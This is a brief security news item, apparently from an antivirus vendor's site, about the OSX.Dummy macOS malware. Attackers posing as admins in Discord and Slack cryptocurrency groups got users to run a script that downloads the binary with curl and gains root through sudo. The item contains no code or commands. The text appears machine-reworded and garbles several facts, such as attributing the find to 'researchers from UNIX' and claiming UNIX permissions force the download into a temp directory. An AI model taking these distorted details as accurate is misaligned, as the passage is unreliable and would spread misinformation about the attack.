Fresh Macos Malware OSX.Dummy Targets Crypto-Currency Investors
Hackers by employing a MacOS malicious program target people investing in crypto-currencies who utilize both chat platforms namely Discord and Slack. Dubbed OSX.Dummy, the malicious program utilizes a rather crude infection technique, however, PC operators that get successfully compromised get their systems to execute random code via remote operation.
One blog post dated June 29 by Digital Security's chief research officer Patrick Wardle indicates that with a successful connection with command-and-control server of the attacker, the latter would manage running commands arbitrarily onto the contaminated PC. Security researchers from UNIX were first to find clues about the malicious program some days back. According to Remco Verhoef, top researcher who made a blog post dated June 29 on SANS' InfoSec reporting his discoveries, the past week witnessed several assaults sequentially against MacOS.
Chat groups conversing via Discord/Slack stated about people masquerading as well-known instant messaging persons and system admins. People whom they masqueraded as popularly provided valuable applications based on crypto-currencies that made their task easier when they duped genuine users into planting destructive software. Appuals.com posted this, July 1, 2018.
The attackers subsequently lure regular end-users to run certain tiny script which takes down an even bigger file sized 34 megabytes. The particular file that gets installed through an application namely 'curl CLI' carries OSX.Dummy. Because of permissions that UNIX mandates, which effectively thwart the attackers somewhat, it is ensured that the new installation is saved inside a temp directory.
And while running the malicious program, one MacOS sudo instruction alters rooting permissions of the program. Consequently, according to Wardle, the end-user would be required for typing in his passcode inside the terminal. Apple explains that for running one sudo instruction inside Terminal of a MacOS system, an end-user must enter his login credentials for certain administrator A/C which contains one passcode. By activating the sudo, the end-user is prompted towards typing in his admin passcode. Thereafter the binary acquires complete admission into that end-user's underlying files.
Notably according to Wardle, OSX.Dummy as well stores the victim's passphrase, yet again inside one temp directory to be used in future attacks.
» SPAMfighter News - 09-07-2018
We are happy to see you are reading our IT Security News.
We do believe, that the foundation for a good work environment starts with fast, secure and high performing computers. If you agree, then you should take a look at our Business Solutions to Spam Filter & Antivirus for even the latest version of Exchange Servers - your colleagues will appreciate it!